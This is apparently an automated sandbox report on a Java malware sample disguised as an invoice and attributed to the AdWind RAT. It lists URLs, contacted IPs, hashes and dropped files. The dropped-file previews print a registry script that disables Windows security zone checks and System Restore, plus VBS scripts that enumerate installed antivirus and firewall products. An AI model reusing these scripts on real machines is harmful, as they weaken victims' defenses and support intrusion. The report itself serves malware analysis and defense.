                                                                                                        http://cps.chambersign.org/cps/chambersroot.htmljavaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.certplus.com/CRL/class3P.crljavaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://apache.org/xml/features/validation/balance-syntax-treesSjava.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://java.sun.com/xml/stream/properties/reader-in-defined-stateodeIterjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://javax.xml.XMLConstants/property/accessExternalDTD3java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://crl.securetrust.com/STCA.crljavaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://apache.org/xml/properties/internal/namespace-binderjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://javax.xml.XMLConstants/property/accessExternalDTD;javaw.exe, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://java.sun.com/dtd/properties.dtdkjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://apache.org/xml/properties/internal/error-reporterSEjava.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://apache.org/xml/properties/internal/datatype-validator-factorysjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://xml.org/sax/properties/ejava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://apache.org/xml/properties/s/dom/iDjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://xml.org/sax/properties/cjava.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://apache.org/xml/properties/security-managerjavaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://java.sun.com/xml/dom/properties/ancestor-checkjavaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://apache.org/xml/features/standard-uri-conformantZjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://apache.org/xml/features/validation/balance-syntax-trees1javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://apache.org/xml/features/namespace-growthSjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://apache.org/xml/features/create-cdata-nodes3java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://apache.org/xml/features/validation/warn-on-undeclared-elemdefsjava.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://apache.org/xml/features/allow-java-encodingserRej9java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://apache.org/xml/features/create-cdata-nodes:java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://apache.org/xml/features/validation/warn-on-undeclared-elemdefkjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://ops.com.pa/jre7.zipWwscript.exe, 00000005.00000003.340480526.00000000053F9000.00000004.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://apache.org/xml/features/xincludejavaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://apache.org/xml/properties/internal/xinclude-handler9java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://apache.org/xml/features/validation/schema-full-checkingjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://gG2DwoT3pJewMEBGx6.comjavaw.exe, 00000009.00000002.591762381.0000000004DA5000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.591752460.0000000004DA1000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://javax.xml.XMLConstants/property/javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://java.sun.com/xml/dom/properties/ancestor-checkurrjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://java.sun.com/xml/dom/properties/ancestor-check3Cjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://ops.com.pa/jre7.zipwscript.exe, 00000005.00000002.372915284.00000000006F3000.00000004.00000010.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://java.sun.com/xml/stream/properties/3pjava.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
Name: http://apache.org/xml/properties/input-buffer-sizes
Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://jrat.io
Source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp; javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp; java.exe, 0000000A.00000002.589242015.0000000004690000.00000004.00000001.sdmp; java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
Malicious: true
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp; javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp; java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp; java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: http://javax.xml.XMLConstants/property/accessExternalSchemaD
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://javax.xml.XMLConstants/property/s3
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp; java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://apache.org/xml/properties/internal/validator/dtd:
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
107.175.101.209 | unknown | United States | 20278 | NEXEONUS | true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 392877
Start date: 19.04.2021
Start time: 23:31:59
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 35s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Invoice PDF.jar
Cookbook file name: defaultwindowsfilecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (Java)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winJAR@133/260@0/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 52%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .jar
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Created / dropped Files have been reduced to 100
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match: NEXEONUS

Associated Sample Name / URL | Detection | Context
0WzJdqE4Rw.dll | malicious | 172.93.133.123
3cneNhQXLA.dll | malicious | 172.93.133.123
O3Hv20MLTO.dll | malicious | 172.93.133.123
3C3QlrM2vJ.dll | malicious | 172.93.133.123
JVDmOtlXaN.dll | malicious | 172.93.133.123
EyHBhihBLX.dll | malicious | 172.93.133.123
9ID7hh46jC.dll | malicious | 172.93.133.123
EY5QMIrtiV.dll | malicious | 172.93.133.123
3o1SlAow2W.dll | malicious | 172.93.133.123
1RQzW0mVpe.dll | malicious | 172.93.133.123
n7o1W05MC8.dll | malicious | 172.93.133.123
fzs2RFsIyX.dll | malicious | 172.93.133.123
rpq7FU7REX.dll | malicious | 172.93.133.123
MQaT6y2WR1.dll | malicious | 172.93.133.123
2AkfHL53PG.dll | malicious | 172.93.133.123
yHofZqHUpA.dll | malicious | 172.93.133.123
t8gXIfeO1k.dll | malicious | 172.93.133.123
bJZDQZ7Yup.dll | malicious | 172.93.133.123
4d4QR5t7LQ.dll | malicious | 172.93.133.123
KGY6KoZer1.dll | malicious | 172.93.133.123

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll

Associated Sample Name / URL | Detection
PO SKP 149684.jar | malicious
CHEQUE COPY.jar | malicious
Ramon_w2-1040_PDF.jar | malicious
Payment.jar | malicious
POHD512-6 5700.jar | malicious
PAYMENT SWIFT COPY.jar | malicious
box.jar | malicious
02_ntfsmgr.jar | malicious
Company profile and Purchase Order.jar | malicious
0076364_00533MXS2.jar | malicious
Order.jar | malicious
ORDER.jar | malicious
Rejected_Stimulus.jar | malicious
COMMUNIQUE2.pdf.jar | malicious
https://margopassadorestylist.com/AT&T/AT&T payment confirmation.pdf.jar | malicious
http://itao.edu.mx/CountrysideEstateseasonsgreetingspdf.jar | malicious
PAYMENT SWIFT.jar | malicious
PAYMENT SWIFT.jar | malicious
https://www.dropbox.com/s/lbf8u07a2eak42i/Orden October.jar?dl=1 | malicious
http://zaricer.usa.cc/Paiement/copie.jar | malicious

Created / dropped Files

C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp
Process: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 57
Entropy (8bit): 4.827903829688525
Encrypted: false
SSDEEP: 3:oFj4I5vpN6yUYCu4v:oJ5X6yN4v
MD5: 3FA9DA5639015C0FFF49B84F73A51D75
SHA1: D5E56F2FE08B86A24EB5BF3859E0EFDB33171C18
SHA-256: B25511D60171DFB2638936A08E35E13647421096309506394DAC3EB84D127796
SHA-512: F48A209F5F8FB371D6AC7E8D5CBEBBF358DC4578D02F565A2C1F8EDE844F7E66096212BF1DA399B658EF44F98283D1E7D2926846858CABB5677A432D5F8BFD1A
Malicious: false
Preview: C:\Program Files (x86)\Java\jre1.8.0_211..1618900395512..

C:\Users\user\AppData\Local\Temp\Config5175199137087621866.sqlite
Process: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):27282
                                                                                                                                                                                              Entropy (8bit):5.34186246815709
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:PJWwXczWquoCtmtatLitmtJCtTt6tVtatNtgtitCtztHtxtMt8thtVRtTtstHtTs:PqgVnuR0hTmEgGpF
                                                                                                                                                                                              MD5:867B59911AF96958B890524CD9002132
                                                                                                                                                                                              SHA1:C8608B295945AC0AD6BD0A7C4CE04579494DA971
                                                                                                                                                                                              SHA-256:ED7FD6C48C814D80DCB80D36C3EE8686E48979BEC7A289B2612D4EF71F59756C
                                                                                                                                                                                              SHA-512:7E5C03DED713EEC2E1B268E09F9777A8CB2F6868BB25941A3A008CBA91551E36DC28275352AF5211151AA78E2C8B3C8347BA8044B31F29C3718C4E5A70FE742C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: Windows Registry Editor Version 5.00..[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments].."SaveZoneInformation"=dword:00000001....[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations].."LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;"....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments].."SaveZoneInformation"=-....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations].."LowRiskFileTypes"=-....[HKEY_CURRENT_USER\Environment].."SEE_MASK_NOZONECHECKS"="1"....[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment].."SEE_MASK_NOZONECHECKS"="1"....[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore].."DisableConfig"=dword:00000001.."DisableSR"=dword:00000001....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executio
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):276
                                                                                                                                                                                              Entropy (8bit):5.064973526456738
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTrLavbx3laDH6djsyn:vmtqvAndZFcrG9lpjsyn
                                                                                                                                                                                              MD5:3BDFD33017806B85949B6FAA7D4B98E4
                                                                                                                                                                                              SHA1:F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
                                                                                                                                                                                              SHA-256:9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
                                                                                                                                                                                              SHA-512:AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              Preview: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""AV"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):281
                                                                                                                                                                                              Entropy (8bit):5.093300055314052
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTQQQavbx3la2Zp6djsyn:vmtqvAndZFcQU9lrXyjsyn
                                                                                                                                                                                              MD5:A32C109297ED1CA155598CD295C26611
                                                                                                                                                                                              SHA1:DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
                                                                                                                                                                                              SHA-256:45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
                                                                                                                                                                                              SHA-512:70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              Preview: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""FIREWALL"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):276
                                                                                                                                                                                              Entropy (8bit):5.064973526456738
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTrLavbx3laDH6djsyn:vmtqvAndZFcrG9lpjsyn
                                                                                                                                                                                              MD5:3BDFD33017806B85949B6FAA7D4B98E4
                                                                                                                                                                                              SHA1:F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
                                                                                                                                                                                              SHA-256:9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
                                                                                                                                                                                              SHA-512:AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              Preview: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""AV"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):281
                                                                                                                                                                                              Entropy (8bit):5.093300055314052
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTQQQavbx3la2Zp6djsyn:vmtqvAndZFcQU9lrXyjsyn
                                                                                                                                                                                              MD5:A32C109297ED1CA155598CD295C26611
                                                                                                                                                                                              SHA1:DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
                                                                                                                                                                                              SHA-256:45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
                                                                                                                                                                                              SHA-512:70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              Preview: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""FIREWALL"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):46592
                                                                                                                                                                                              Entropy (8bit):6.0299567620950425
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:5iUNFqJL3HXiQl2DuhacwRZPE7dmvqID8ouM2PkYEDienAZu+P:TNFW33hdxwz87dmRDbkPKg
                                                                                                                                                                                              MD5:0B7B52302C8C5DF59D960DD97E3ABDAF
                                                                                                                                                                                              SHA1:D85524F464DCDED54EDFCFE6A5056F6C4008BBCB
                                                                                                                                                                                              SHA-256:A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
                                                                                                                                                                                              SHA-512:FA04A69CACD05042DC9F3EF0BB518B01952B59A5A2669BA3817C3E248E95F54801349CB51FCFA7CD1F3C4CB7C28615A61156D574C4F7197FDBA709544A5E8EBC
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                              • Rule: JoeSecurity_AdWind_dll, Description: Yara detected AdWind RAT's dll, Source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll, Author: Joe Security
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 75%
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: PO SKP 149684.jar, Detection: malicious
                                                                                                                                                                                              • Filename: CHEQUE COPY.jar, Detection: malicious
                                                                                                                                                                                              • Filename: Ramon_w2-1040_PDF.jar, Detection: malicious
                                                                                                                                                                                              • Filename: Payment.jar, Detection: malicious
                                                                                                                                                                                              • Filename: POHD512-6 5700.jar, Detection: malicious
                                                                                                                                                                                              • Filename: PAYMENT SWIFT COPY.jar, Detection: malicious
                                                                                                                                                                                              • Filename: box.jar, Detection: malicious
                                                                                                                                                                                              • Filename: 02_ntfsmgr.jar, Detection: malicious
                                                                                                                                                                                              • Filename: Company profile and Purchase Order.jar, Detection: malicious
                                                                                                                                                                                              • Filename: 0076364_00533MXS2.jar, Detection: malicious
                                                                                                                                                                                              • Filename: Order.jar, Detection: malicious
                                                                                                                                                                                              • Filename: ORDER.jar, Detection: malicious
                                                                                                                                                                                              • Filename: Rejected_Stimulus.jar, Detection: malicious
                                                                                                                                                                                              • Filename: COMMUNIQUE2.pdf.jar, Detection: malicious
                                                                                                                                                                                              • Filename: PAYMENT SWIFT.jar, Detection: malicious
                                                                                                                                                                                              • Filename: PAYMENT SWIFT.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../../../..@.a.9..@.T.!..@.`.z..&.Y.*../..~..@.e....@.Q....@.W....Rich/..........PE..L.....uW...........!.....p...B......8...............................................R3....@.........................p..........<...............................<...`...............................0...@...............$............................text...Zo.......p.................. ..`.rdata..%%.......&...t..............@..@.data....+..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):39424
                                                                                                                                                                                              Entropy (8bit):5.830789080830882
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:1bsFy+m3Eq3booHrhmkkGn2OEDffZlchud0:1j73fdmkLwH
                                                                                                                                                                                              MD5:C17B03D5A1F0DC6581344FD3D67D7BE1
                                                                                                                                                                                              SHA1:D39F33C514B9DABAFD3502D8E57E6EF078B1B454
                                                                                                                                                                                              SHA-256:1AFB6AB4B5BE19D0197BCB76C3B150153955AE569CFE18B8E40B74B97CCD9C3D
                                                                                                                                                                                              SHA-512:6B41F2FD24F7667FC0FFAF94967BE0E7C1EFEE655AECD01F867C142FC81281DB631BE66FFEFD4D7E69BAF1674292A79A8B110B7B12A2EBE71128C2CC1A1C82B0
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
